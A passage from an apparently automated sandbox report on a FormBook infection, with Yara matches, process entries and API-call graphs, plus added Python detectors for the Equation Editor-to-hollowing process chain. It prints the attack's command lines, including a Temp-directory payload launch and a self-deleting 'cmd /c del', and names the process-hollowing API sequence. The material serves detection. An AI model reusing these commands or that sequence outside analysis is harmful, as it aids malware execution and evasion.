                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 24%, ReversingLabs
                                                Reputation:low

                                                Target ID:9
                                                Start time:18:38:34
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\notepad.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
                                                Imagebase:0x660000
                                                File size:179712 bytes
                                                MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Target ID:10
                                                Start time:18:38:41
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0xff040000
                                                File size:3229696 bytes
                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:11
                                                Start time:18:39:20
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                Imagebase:0x370000
                                                File size:27136 bytes
                                                MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Target ID:12
                                                Start time:18:39:25
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Windows\SysWOW64\notepad.exe"
                                                Imagebase:0x4ab40000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
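
The process list above is the chain a detection engineer would write rules for: Equation Editor spawning a child, cmd.exe launching a payload out of %tmp%, an executable running from the user's Temp directory, a SysWOW64 binary started with a COM /Processid switch by that Temp-directory process, and a final cmd /c del against a file under C:\Windows. The Python below is an added example, not Joe Sandbox output and not FormBook code; it runs those checks over process-creation records constructed from the target entries above. The listing does not state parent-child links, so the parent_image values are assumptions: in line with the report's signatures (office equation editor starts processes, office process drops PE file, uses ipconfig), the chain is taken as cmd.exe under EQNEDT32.EXE, Client.exe under cmd.exe, notepad.exe under Client.exe, ipconfig.exe under explorer.exe and the deleting cmd.exe under ipconfig.exe.

```python
"""Process-creation triage for the Equation Editor to FormBook chain (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str   # assumed links, see lead-in; "" when unknown


USER_WRITABLE = re.compile(r"%tmp%|%temp%|\\AppData\\Local\\Temp\\|\\Users\\[^\\]+\\Downloads\\", re.I)
SELF_DELETE = re.compile(r'/c\s+del\s+"?C:\\Windows\\', re.I)
COM_SURROGATE = re.compile(r"/Processid:\{[0-9A-F-]{36}\}", re.I)
SYSTEM_DIR = "c:\\windows\\"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def under_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIR)


def triage(events: List[ProcEvent]) -> List[Dict]:
    """Apply the chain heuristics to each event; returns one finding per rule hit."""
    findings = []
    for ev in events:
        parent, image = basename(ev.parent_image), basename(ev.image)
        hits = []
        if parent == "eqnedt32.exe":                     # CVE-2017-11882 / CVE-2018-0802 pattern
            hits.append("eqnedt32_child")
        if image == "cmd.exe" and USER_WRITABLE.search(ev.cmdline):
            hits.append("cmd_launches_temp_payload")
        if USER_WRITABLE.search(ev.image):               # binary itself lives in Temp
            hits.append("exe_running_from_temp")
        if (under_system_dir(ev.image) and COM_SURROGATE.search(ev.cmdline)
                and not under_system_dir(ev.parent_image)):
            hits.append("system_binary_com_switch_nonsystem_parent")   # hollowing host candidate
        if image == "cmd.exe" and SELF_DELETE.search(ev.cmdline):
            hits.append("cmd_deletes_system_binary")
        findings.extend({"pid": ev.pid, "image": image, "rule": h} for h in hits)
    return findings


def chain_detected(findings: List[Dict]) -> bool:
    """True when the exploit, the Temp payload and the hollowing host all appear."""
    rules = {f["rule"] for f in findings}
    return {"eqnedt32_child", "exe_running_from_temp",
            "system_binary_com_switch_nonsystem_parent"} <= rules


# Constructed from the report's target entries; parent links are assumptions.
REPORT_EVENTS = [
    ProcEvent(0, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding', ""),
    ProcEvent(2, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
              r"C:\Windows\System32\svchost.exe"),      # COM-activated; parent assumed
    ProcEvent(3, r"C:\Windows\SysWOW64\cmd.exe", r"CmD.exe /C %tmp%\Client.exe A C",
              r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"),
    ProcEvent(6, r"C:\Users\user\AppData\Local\Temp\Client.exe",
              r"C:\Users\user\AppData\Local\Temp\Client.exe A C", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(9, r"C:\Windows\SysWOW64\notepad.exe",
              r"C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}",
              r"C:\Users\user\AppData\Local\Temp\Client.exe"),
    ProcEvent(10, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE", ""),
    ProcEvent(11, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe",
              r"C:\Windows\explorer.exe"),
    ProcEvent(12, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Windows\SysWOW64\notepad.exe"',
              r"C:\Windows\SysWOW64\ipconfig.exe"),
]


if __name__ == "__main__":
    found = triage(REPORT_EVENTS)
    for f in found:
        print(f)
    print("chain detected:", chain_detected(found))
```

The /Processid switch is legitimate COM local-server activation, so the rule keys on the parent not living under C:\Windows rather than on the switch alone; the EQNEDT32.EXE rule fires on any child, which is the right default because the equation editor has no business starting processes.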


                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:50.8%
                                                  Total number of Nodes:65
                                                  Total number of Limit Nodes:2
Execution graph nodes (API calls reached from the Client.exe memory dumps; the graph's node numbers and edge list are omitted):

  0x322790 -> 0x3227d0  CloseHandle
  0x322a98 -> 0x322ae0  VirtualProtect
  0x36aff8 -> 0x36b004 -> 0x4e65052 / 0x4e650ef -> 0x37ea88 -> 0x37eb11  CreateProcessW
  0x36b004 -> 0x4e60048 / 0x4e6001f / 0x4e616d0 -> 0x4a0b24 -> 0x4a3780 -> 0x4a37c0  VirtualAllocExNuma
  0x37d398 -> 0x37d3e6  NtProtectVirtualMemory
  0x37d898 -> 0x37d8e0  NtWriteVirtualMemory
  0x87ba28 -> 0x322540 -> 0x322545  NtQuerySystemInformation
  0x87ba28 -> 0x322548 -> 0x322590  NtQuerySystemInformation
  0x37dd98 -> 0x37ddd8  NtSetContextThread
  0x240b7b0 -> 0x240b7f5  NtCreateThreadEx
  0x4a0178 -> 0x4a01b8  NtClose
  0x4d33f8 -> 0x4d3443  LdrLoadDll
  0x37ce80 -> 0x37cecb  NtAllocateVirtualMemory
  0x37f248 -> 0x37f290  NtResumeThread
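
The execution graph lists the primitives behind the process hollowing the report flags: CreateProcessW alongside NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtSetContextThread and NtResumeThread in the Client.exe dumps. A graph alone does not show that those calls hit the same child process in that order, which is what an API-trace rule needs. The Python below is an added example, not part of the report; it matches the ordered sequence per caller and per target process over a call trace. The trace is constructed to mirror the report's process IDs (cmd.exe is 3, Client.exe is 6, notepad.exe is 9) and assumes the tracer has already resolved process and thread handles to a target PID, as sandbox API monitors generally do.

```python
"""Ordered API-sequence match for process hollowing (added example, not report code)."""
from typing import Dict, List, Optional

# Each step accepts any of several equivalent APIs; NtProtectVirtualMemory is
# common but optional, so it is deliberately not a required step.
HOLLOWING_STEPS = [
    ("create_child", {"CreateProcessW", "CreateProcessA", "NtCreateUserProcess"}),
    ("allocate_in_child", {"NtAllocateVirtualMemory", "VirtualAllocEx",
                           "VirtualAllocExNuma", "NtMapViewOfSection"}),
    ("write_payload", {"NtWriteVirtualMemory", "WriteProcessMemory"}),
    ("redirect_thread", {"NtSetContextThread", "SetThreadContext"}),
    ("resume", {"NtResumeThread", "ResumeThread"}),
]


def match_hollowing(trace: List[Dict]) -> List[Dict]:
    """Find complete hollowing sequences in a call trace.

    trace records are {"pid": caller, "api": name, "target": child pid or None}
    in call order.  Progress is tracked per (caller, target) so writes into one
    child cannot be combined with a resume of another, and unrelated calls in
    between are ignored.
    """
    state: Dict[tuple, tuple] = {}     # (caller, target) -> (next step, positions)
    matches = []
    for pos, rec in enumerate(trace):
        key = (rec["pid"], rec.get("target"))
        step, hits = state.get(key, (0, []))
        if step < len(HOLLOWING_STEPS) and rec["api"] in HOLLOWING_STEPS[step][1]:
            step, hits = step + 1, hits + [pos]
            if step == len(HOLLOWING_STEPS):
                matches.append({"caller": rec["pid"], "target": rec["target"],
                                "positions": hits,
                                "steps": [name for name, _ in HOLLOWING_STEPS]})
                state.pop(key, None)
            else:
                state[key] = (step, hits)
    return matches


def _call(pid: int, api: str, target: Optional[int] = None) -> Dict:
    return {"pid": pid, "api": api, "target": target}


# Constructed trace: cmd.exe (3) starts Client.exe (6) normally, then Client.exe
# hollows notepad.exe (9).  Call order is illustrative, not taken from the report.
SAMPLE_TRACE = [
    _call(3, "CreateProcessW", 6),            # 0  ordinary process start, no injection
    _call(3, "NtClose"),                      # 1
    _call(6, "NtQuerySystemInformation"),     # 2
    _call(6, "CreateProcessW", 9),            # 3  child created (suspended)
    _call(6, "NtAllocateVirtualMemory", 9),   # 4
    _call(6, "NtWriteVirtualMemory", 9),      # 5
    _call(6, "NtWriteVirtualMemory", 9),      # 6  second write, already past that step
    _call(6, "NtProtectVirtualMemory", 9),    # 7  optional, ignored by the matcher
    _call(6, "NtSetContextThread", 9),        # 8
    _call(6, "NtResumeThread", 9),            # 9
    _call(6, "NtClose"),                      # 10
]


if __name__ == "__main__":
    for m in match_hollowing(SAMPLE_TRACE):
        print(m)
```

Where the sandbox's NtCreateThreadEx and Queues an APC signatures apply, the same matcher can be reused with an alternative last step (NtCreateThreadEx or NtQueueApcThread instead of a context change plus resume).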

Control-flow Graph

(rendered graph of the function at 0x2400048 in the Client.exe dump, basic blocks from 0x2400048 up to 0x240a498 with executed and not-executed nodes coloured; block and edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ~?Rt
                                                  • API String ID: 0-1517691117
                                                  • Opcode ID: 1cca5bb6ab5b21d18866f0d06f5b3d8b345bb90045d2cb00677913dd56731e37
                                                  • Instruction ID: ca2457242033d4d746aeb837832ffa5f56412147cb9c12d0c599e4a60b8692a4
                                                  • Opcode Fuzzy Hash: 1cca5bb6ab5b21d18866f0d06f5b3d8b345bb90045d2cb00677913dd56731e37
                                                  • Instruction Fuzzy Hash: 08A2C6B4E502298FCBA4DF28EE94698B7F5BB98344F1055BA950DE7798DB305E84CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph of the function at 0x321338 in the Client.exe dump, basic blocks from 0x321338 up to 0x32196d including calls to 0x3210d0, executed and not-executed nodes coloured; block and edge list omitted)
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: z@_`
                                                  • API String ID: 0-634204903
                                                  • Opcode ID: 486dee35f144d54ec4ab0a894b8296dc3ba2a9714fd2967645295d89f900c5e6
                                                  • Instruction ID: 48f852e9fb56ac568e5e2cb8ea72cc2a259e6928e5403421c37aaa290a473f40
                                                  • Opcode Fuzzy Hash: 486dee35f144d54ec4ab0a894b8296dc3ba2a9714fd2967645295d89f900c5e6
                                                  • Instruction Fuzzy Hash: B1F1D375F001188FC719DF78EA646AD77B3ABD4344B249429D016EBB68EF349D06CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 240b7b0-240b87d, calls NtCreateThreadEx (rendered graph omitted)
                                                  APIs
                                                  • NtCreateThreadEx.NTDLL(?,6D71FA28,?,?,?,00000000,?,?,?,?,?), ref: 0240B842
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: c99153474a9a43be38393fee661f748c2ec7aee304712f46ec871d34fa3a810f
                                                  • Instruction ID: 3522e96e54aae2c54f8489b2523effedd4285e3983d7a1986d24fa0b403683dd
                                                  • Opcode Fuzzy Hash: c99153474a9a43be38393fee661f748c2ec7aee304712f46ec871d34fa3a810f
                                                  • Instruction Fuzzy Hash: FB213972D00259ABCF01DFA9C844BEEBBB5FF48214F04851AE918B3250C7759964CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 37d898-37d963, calls NtWriteVirtualMemory (rendered graph omitted)
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 0037D928
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: e4140079b0fccb128c4c25080b6c358380f401fc5787daa74a4c6d9ac6d9a195
                                                  • Instruction ID: cfe44b2c6e9f13b8b04fc4057b2068dda0f029c72177562024ad01574cb91e90
                                                  • Opcode Fuzzy Hash: e4140079b0fccb128c4c25080b6c358380f401fc5787daa74a4c6d9ac6d9a195
                                                  • Instruction Fuzzy Hash: CE2125759002489FCB10CFA9D884BDEBBF4FF48314F10892AE919A7340D778A904CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 37d398-37d45c, calls NtProtectVirtualMemory (rendered graph omitted)
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0037D421
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: 8a65ddcc4b173bdedc29d86078903a83c725768e619d9d56b835a556c969f61c
                                                  • Instruction ID: 23cb5294a7a2d053328409ae39db674f1113134967ca30ab681bd1fd19dc52de
                                                  • Opcode Fuzzy Hash: 8a65ddcc4b173bdedc29d86078903a83c725768e619d9d56b835a556c969f61c
                                                  • Instruction Fuzzy Hash: 6C2103B1D002099FCB10CFAAD984ADEFBF4FF48314F60882AE519A7340C775A904CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 37ce80-37cf3e, calls NtAllocateVirtualMemory (rendered graph omitted)
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0037CF03
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 9c1f97fafa8341048c8362b08d644edc543a457a78e9095d8d5c74c09f3c572e
                                                  • Instruction ID: 1d82ef3c79ea9fca0cdff68f17a9f6ca1bf63c05c8be72536affe99478ea34b2
                                                  • Opcode Fuzzy Hash: 9c1f97fafa8341048c8362b08d644edc543a457a78e9095d8d5c74c09f3c572e
                                                  • Instruction Fuzzy Hash: 3A212571D002099FCB10CFA9D884ADEFBF5BF48314F10841AE519A7200C775A954CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 4d33f8-4d34b0, calls LdrLoadDll (rendered graph omitted)
                                                  APIs
                                                  • LdrLoadDll.NTDLL(?,?,?,?), ref: 004D3475
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949869344.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4d0000_Client.jbxd
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b1440f9cdcd3edaeba8b8627bf896f99531d05d1db7f5b08cb5a9e470ab6f09d
                                                  • Instruction ID: b9fec98fc1192a7b5f68bd6673e60e9675f17b6c446c09c77841ed94cdc5c14a
                                                  • Opcode Fuzzy Hash: b1440f9cdcd3edaeba8b8627bf896f99531d05d1db7f5b08cb5a9e470ab6f09d
                                                  • Instruction Fuzzy Hash: 722107B1D002089FCB10DFA9D884BDEFBF4BF48314F50892AE519A7340C778A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 322540-3225f7, calls NtQuerySystemInformation (rendered graph omitted)
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003225BC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: 9472b4700be2db3f49c5034473cbbaaaa1f00f9570c26a5a17bf4a0b7a1c95b7
                                                  • Instruction ID: c9481f0d117b029a5a505e036a4ed5c37a248b201dd8830e4b6ff715fcab16f8
